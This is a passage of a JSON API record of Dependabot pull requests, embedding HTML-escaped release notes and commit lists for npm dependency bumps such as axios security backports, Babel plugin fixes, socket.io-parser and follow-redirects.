href=\"https://github.com/socketio/socket.io/commit/07cbe1510ded7e5460cb82e026e2533e50e30eaf\"\u003e\u003ccode\u003e07cbe15\u003c/code\u003e\u003c/a\u003e fix(eio): add \u003ccode\u003e@​types/ws\u003c/code\u003e as dependency (\u003ca href=\"https://redirect.github.com/socketio/socket.io/issues/5458\"\u003e#5458\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/socketio/socket.io/commit/44ed73f53995d35ef0c8d10df6806d5687238282\"\u003e\u003ccode\u003e44ed73f\u003c/code\u003e\u003c/a\u003e fix(eio): emit initial_headers and headers events in uServer (\u003ca href=\"https://redirect.github.com/socketio/socket.io/issues/5460\"\u003e#5460\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/socketio/socket.io/commit/da04267ffc7b0903ca91f2fccb80e56246d13328\"\u003e\u003ccode\u003eda04267\u003c/code\u003e\u003c/a\u003e fix: cleanup pending acks on timeout to prevent memory leak (\u003ca href=\"https://redirect.github.com/socketio/socket.io/issues/5442\"\u003e#5442\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/socketio/socket.io/commit/74599a6b9e3dbeff1a9efe46c305d5d25d6e3dd8\"\u003e\u003ccode\u003e74599a6\u003c/code\u003e\u003c/a\u003e fix(types): properly import http module\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/socketio/socket.io/commit/d48718cb675721fc1252775115592ebd1b255899\"\u003e\u003ccode\u003ed48718c\u003c/code\u003e\u003c/a\u003e ci: use actions/checkout@v6 and actions/setup-node@v6 (\u003ca href=\"https://redirect.github.com/socketio/socket.io/issues/5449\"\u003e#5449\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/socketio/socket.io/compare/socket.io-parser@4.2.4...socket.io-parser@4.2.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for socket.io-parser since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `axios` from 0.30.3 to 1.16.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/releases\"\u003eaxios's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.32.0 — May 4, 2026\u003c/h2\u003e\n\u003cp\u003eThis release backports a comprehensive set of security and hardening fixes from the v1.x branch into v0.x, covering prototype-pollution protections, default error redaction, stricter proxy/cookie/socket handling, and one breaking change to merged config and header object prototypes.\u003c/p\u003e\n\u003ch2\u003e⚠️ Breaking Changes \u0026amp; Deprecations\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eNull-prototype merged objects: mergeConfig and header merging now return objects with a null prototype to block prototype-pollution gadgets. Consumers must use Object.prototype.hasOwnProperty.call(obj, key) and avoid implicit string coercion against merged config or header objects. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDefault error redaction: AxiosError.toJSON() now redacts sensitive keys by default to prevent credential leaks in logs. The behavior is configurable via config.redact, with defaults exposed on defaults.redact. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCookie \u0026amp; XSRF handling: Cookie names are read literally rather than via regex, and only own properties are respected when evaluating withXSRFToken. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eProxy bypass IPv6 parity: NO_PROXY matching now handles canonical IPv4-mapped IPv6 forms such as ::ffff:127.0.0.1 and ::ffff:7f00:1. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNode http adapter hardening: Strips Proxy-Authorization when no proxy is in use and gates socketPath behind a new allowedSocketPaths allowlist (string or array, normalized) to reduce accidental Unix socket exposure. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBrowser xhr adapter: Stricter own-property checks when reading config and headers. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eURL parameters: AxiosURLSearchParams keeps %00 encoded and applies consistent encoding throughout. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePublic type surface: Adds formDataHeaderPolicy, redact, and allowedSocketPaths to the TypeScript declarations alongside their runtime defaults. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRepo hygiene: Updates README.md and CHANGELOG.md, adds AGENTS.md, and refreshes the issue and PR templates. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/axios/axios/compare/v0.31.1...v0.32.0\"\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.31.1\u003c/h2\u003e\n\u003cp\u003eThis release backports a broad set of security hardenings from the v1 line — covering prototype-pollution defences, stream size enforcement, XSRF handling, URL null-byte encoding, and bounded FormData recursion — and drops committed \u003ccode\u003edist/\u003c/code\u003e artefacts along with Bower support.\u003c/p\u003e\n\u003ch2\u003e⚠️ Breaking Changes \u0026amp; Deprecations\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBower \u0026amp; Committed \u003ccode\u003edist/\u003c/code\u003e Removed:\u003c/strong\u003e \u003ccode\u003edist/\u003c/code\u003e bundles are no longer committed to the repo, and \u003ccode\u003ebower.json\u003c/code\u003e plus the Grunt \u003ccode\u003epackage2bower\u003c/code\u003e task have been removed. CI still builds bundles before publish, so npm/yarn/pnpm consumers are unaffected; installs via Bower or directly from the git tree must migrate to npm or a CDN. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10747\"\u003e#10747\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution in Header Merge (GHSA-6chq-wfr3-2hj9):\u003c/strong\u003e Tightened \u003ccode\u003eisFormData\u003c/code\u003e to reject plain/null-prototype objects and require \u003ccode\u003eappend\u003c/code\u003e, and guarded the Node HTTP adapter so \u003ccode\u003edata.getHeaders()\u003c/code\u003e is only merged when it is not inherited from \u003ccode\u003eObject.prototype\u003c/code\u003e. Blocks injected headers via polluted \u003ccode\u003egetHeaders\u003c/code\u003e. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10750\"\u003e#10750\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution in Config Merging (GHSA-pf86-5x62-jrwf):\u003c/strong\u003e \u003ccode\u003emergeConfig\u003c/code\u003e, defaults resolution, and the HTTP adapter now uses own-property checks for \u003ccode\u003etransport\u003c/code\u003e, \u003ccode\u003eenv\u003c/code\u003e, \u003ccode\u003eBlob\u003c/code\u003e, \u003ccode\u003eformSerializer\u003c/code\u003e, and transforms arrays, and merged configs are returned as null-prototype objects. Prevents hijacking of the request flow through polluted prototypes. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10752\"\u003e#10752\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFormData / Params Recursion DoS:\u003c/strong\u003e Added a configurable \u003ccode\u003emaxDepth\u003c/code\u003e (default \u003ccode\u003e100\u003c/code\u003e, \u003ccode\u003eInfinity\u003c/code\u003e disables) to \u003ccode\u003etoFormData\u003c/code\u003e and params serialisation, throwing \u003ccode\u003eAxiosError\u003c/code\u003e with code \u003ccode\u003eERR_FORM_DATA_DEPTH_EXCEEDED\u003c/code\u003e when exceeded. Circular-reference detection is preserved. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10728\"\u003e#10728\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eNull-Byte Injection in Query Strings:\u003c/strong\u003e Removed the unsafe \u003ccode\u003e%00\u003c/code\u003e → null-byte substitution from \u003ccode\u003eAxiosURLSearchParams.encode\u003c/code\u003e so \u003ccode\u003e%00\u003c/code\u003e is preserved as-is. Other encoding behaviour (including \u003ccode\u003e%20\u003c/code\u003e → \u003ccode\u003e+\u003c/code\u003e) unchanged. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10737\"\u003e#10737\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eConsolidated v1 Security Backport:\u003c/strong\u003e Rolls up remaining v1 hardenings into \u003ccode\u003ev0.x\u003c/code\u003e: \u003ccode\u003emaxContentLength\u003c/code\u003e enforcement for \u003ccode\u003eresponseType: 'stream'\u003c/code\u003e via a guarded transform with deferred piping, \u003ccode\u003emaxBodyLength\u003c/code\u003e enforcement for streamed uploads on native \u003ccode\u003ehttp\u003c/code\u003e/\u003ccode\u003ehttps\u003c/code\u003e with \u003ccode\u003emaxRedirects: 0\u003c/code\u003e, and stricter \u003ccode\u003ewithXSRFToken\u003c/code\u003e handling so only own boolean \u003ccode\u003etrue\u003c/code\u003e enables cross-origin XSRF headers. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10764\"\u003e#10764\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eCODEOWNERS:\u003c/strong\u003e Added \u003ccode\u003e.github/CODEOWNERS\u003c/code\u003e with \u003ccode\u003e* @jasonsaayman\u003c/code\u003e to set a default reviewer for all paths. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10740\"\u003e#10740\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/axios/axios/compare/v0.31.0...v0.31.1\"\u003eFull Changelog\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.31.0\u003c/h2\u003e\n\u003cp\u003eThis release backports security fixes from v1.x, hardens the CI/CD supply chain with OIDC publishing and \u003ccode\u003ezizmor\u003c/code\u003e scanning, resolves TypeScript typing issues in \u003ccode\u003eAxiosInstance\u003c/code\u003e, and fixes a performance regression in \u003ccode\u003eisEmptyObject()\u003c/code\u003e.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/8db2d44896849a21ed9721185b1034df24e1ba7b\"\u003e\u003ccode\u003e8db2d44\u003c/code\u003e\u003c/a\u003e chore: bump version to v0.32.0 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10840\"\u003e#10840\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/2af6116a957b1dd1b32056181326da8a5540d3bc\"\u003e\u003ccode\u003e2af6116\u003c/code\u003e\u003c/a\u003e chore: backport fixes from the v1x branch (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/a589dc525af12e0fabef7d6e5be028ad433eee31\"\u003e\u003ccode\u003ea589dc5\u003c/code\u003e\u003c/a\u003e chore: bump version to v0.31.1 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10766\"\u003e#10766\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/b0c632f36a5ea2e73c9bdf3a54164a8ede925736\"\u003e\u003ccode\u003eb0c632f\u003c/code\u003e\u003c/a\u003e fix: backport security issues (\u003ca href=\"https://redirect.gith...\n\n_Description has been truncated_","html_url":"https://github.com/alexcolls/p2p-wallet-web/pull/31","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/alexcolls%2Fp2p-wallet-web/issues/31","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/31/packages"},{"uuid":"4546813238","node_id":"PR_kwDOKdAFf87gjxJJ","number":47,"state":"closed","title":"Bump the npm_and_yarn group across 12 directories with 14 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-05-30T04:19:13.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-29T08:05:42.000Z","updated_at":"2026-05-30T04:19:15.000Z","time_to_close":72811,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":14,"packages":[{"name":"@babel/plugin-transform-modules-systemjs","old_version":"7.22.11","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"follow-redirects","old_version":"1.15.3","new_version":"1.16.0","repository_url":"https://github.com/follow-redirects/follow-redirects"},{"name":"tmp","old_version":"0.2.1","new_version":"0.2.7","repository_url":"https://github.com/raszi/node-tmp"},{"name":"lodash","old_version":"4.17.21","new_version":"4.18.1","repository_url":"https://github.com/lodash/lodash"},{"name":"postcss","old_version":"8.4.27","new_version":"8.5.12","repository_url":"https://github.com/postcss/postcss"},{"name":"serialize-javascript","old_version":"6.0.1","new_version":"7.0.5"},{"name":"vite","old_version":"4.4.7","new_version":"7.3.2","repository_url":"https://github.com/vitejs/vite"},{"name":"webpack-dev-server","old_version":"4.15.1","new_version":"5.2.3"},{"name":"postcss","old_version":"8.4.31","new_version":"8.5.15","repository_url":"https://github.com/postcss/postcss"},{"name":"vite","old_version":"4.4.9","new_version":"4.5.14","repository_url":"https://github.com/vitejs/vite"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 4 updates in the /tasks/angular/easy/hello directory: [@babel/plugin-transform-modules-systemjs](https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs), [follow-redirects](https://github.com/follow-redirects/follow-redirects), [tmp](https://github.com/raszi/node-tmp) and [lodash](https://github.com/lodash/lodash).\nBumps the npm_and_yarn group with 3 updates in the /tasks/astro/easy/hello directory: [postcss](https://github.com/postcss/postcss), [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite) and [astro](https://github.com/withastro/astro/tree/HEAD/packages/astro).\nBumps the npm_and_yarn group with 1 update in the /tasks/electron/easy directory: [electron](https://github.com/electron/electron).\nBumps the npm_and_yarn group with 1 update in the /tasks/graphql/easy directory: [@protobufjs/utf8](https://github.com/dcodeIO/protobuf.js).\nBumps the npm_and_yarn group with 1 update in the /tasks/laravel/easy/greeting_app directory: [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite).\nBumps the npm_and_yarn group with 2 updates in the /tasks/nextjs/easy/nextjs-easy directory: [postcss](https://github.com/postcss/postcss) and [next](https://github.com/vercel/next.js).\nBumps the npm_and_yarn group with 2 updates in the /tasks/react/easy/react-easy directory: [postcss](https://github.com/postcss/postcss) and [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite).\nBumps the npm_and_yarn group with 3 updates in the /tasks/svelte/easy/hello directory: [postcss](https://github.com/postcss/postcss), [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite) and [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /tasks/tailwind directory: [postcss](https://github.com/postcss/postcss).\nBumps the npm_and_yarn group with 2 updates in the /tasks/typescript/vitest/easy directory: [postcss](https://github.com/postcss/postcss) and [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite).\nBumps the npm_and_yarn group with 3 updates in the /tasks/vue/easy/todo-list directory: [@babel/plugin-transform-modules-systemjs](https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs), [follow-redirects](https://github.com/follow-redirects/follow-redirects) and [lodash](https://github.com/lodash/lodash).\nBumps the npm_and_yarn group with 3 updates in the /tasks/vue/medium/vue-task-list directory: [@babel/plugin-transform-modules-systemjs](https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs), [follow-redirects](https://github.com/follow-redirects/follow-redirects) and [lodash](https://github.com/lodash/lodash).\n\nUpdates `@babel/plugin-transform-modules-systemjs` from 7.22.11 to 7.29.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e@​babel/plugin-transform-modules-systemjs's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.7 (2026-05-25)\u003c/h2\u003e\n\u003cp\u003eRe-release all packages with npm provenance attestations\u003c/p\u003e\n\u003ch2\u003ev7.29.6 (2026-05-25)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18014\"\u003e#18014\u003c/a\u003e Catchup source map position in preserveFormat (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18001\"\u003e#18001\u003c/a\u003e [7.x packport]Improve input source map handling (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17998\"\u003e#17998\u003c/a\u003e Preserve original identifier names from input sourcemaps (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17992\"\u003e#17992\u003c/a\u003e) (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 3\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMateusz Burzyński (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.5 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:house:  Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate \u003ccode\u003e@babel/*\u003c/code\u003e dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.4 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-modules-systemjs\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17974\"\u003e#17974\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 1\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.3 (2026-04-30)\u003c/h2\u003e\n\u003ch4\u003e:eyeglasses: Spec Compliance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17923\"\u003e#17923\u003c/a\u003e Support flow extends bound (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-helper-create-class-features-plugin\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17931\"\u003e#17931\u003c/a\u003e fix(decorators): replace super within all removed static elements (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-register\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17915\"\u003e#17915\u003c/a\u003e Fix thread synchronization issues in \u003ccode\u003e@babel/register\u003c/code\u003e (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-compat-data\u003c/code\u003e, \u003ccode\u003ebabel-plugin-bugfix-safari-rest-destructuring-rhs-array\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17788\"\u003e#17788\u003c/a\u003e Add bugfix plugin for Safari array rest destructuring bug (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/4fba7541180bf5f58256d8e358b544e3831ad090\"\u003e\u003ccode\u003e4fba754\u003c/code\u003e\u003c/a\u003e v7.29.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a458f66074b97d54773db8159af673d23b26079b\"\u003e\u003ccode\u003ea458f66\u003c/code\u003e\u003c/a\u003e v7.29.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/32ebd5aaf2526ddd176fd6a3d1e3dc594abdc8d9\"\u003e\u003ccode\u003e32ebd5a\u003c/code\u003e\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17974\"\u003e#17974\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aa8394e454337d118ac3d40bfa3ee1a3cb3f3ed2\"\u003e\u003ccode\u003eaa8394e\u003c/code\u003e\u003c/a\u003e v7.29.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/0053db620c05acf0036f593b5aaf4e372daa79d0\"\u003e\u003ccode\u003e0053db6\u003c/code\u003e\u003c/a\u003e Update polyfill packages (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17727\"\u003e#17727\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/61647ae2397c82c3c71f077b5ab109106a5cac0f\"\u003e\u003ccode\u003e61647ae\u003c/code\u003e\u003c/a\u003e v7.28.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a177d551adba99773f4ff00ea9bf46550def6132\"\u003e\u003ccode\u003ea177d55\u003c/code\u003e\u003c/a\u003e [Babel 8] Use \u003ccode\u003et.traverseFast\u003c/code\u003e to replace some \u003ccode\u003epath.traverse\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17518\"\u003e#17518\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/eebd3a06021c13d335b5b0bd79734df3abbea678\"\u003e\u003ccode\u003eeebd3a0\u003c/code\u003e\u003c/a\u003e v7.27.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/317e332e650bc04907bc787ab79f930288a3e71e\"\u003e\u003ccode\u003e317e332\u003c/code\u003e\u003c/a\u003e Enforce node protocol import (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17207\"\u003e#17207\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/fdc0fb59e119ee0b38bced63867a344a5b4bc2f3\"\u003e\u003ccode\u003efdc0fb5\u003c/code\u003e\u003c/a\u003e [Babel 8] Bump nodejs requirements to \u003ccode\u003e^20.19.0 || \u0026gt;= 22.12.0\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17204\"\u003e#17204\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.7/packages/babel-plugin-transform-modules-systemjs\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​babel/plugin-transform-modules-systemjs\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `follow-redirects` from 1.15.3 to 1.16.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/0c23a223067201c368035e82954c11eb2578a33b\"\u003e\u003ccode\u003e0c23a22\u003c/code\u003e\u003c/a\u003e Release version 1.16.0 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9\"\u003e\u003ccode\u003e844c4d3\u003c/code\u003e\u003c/a\u003e Add sensitiveHeaders option.\u003c/li\u003e\n\u003cli\u003e\u003ca 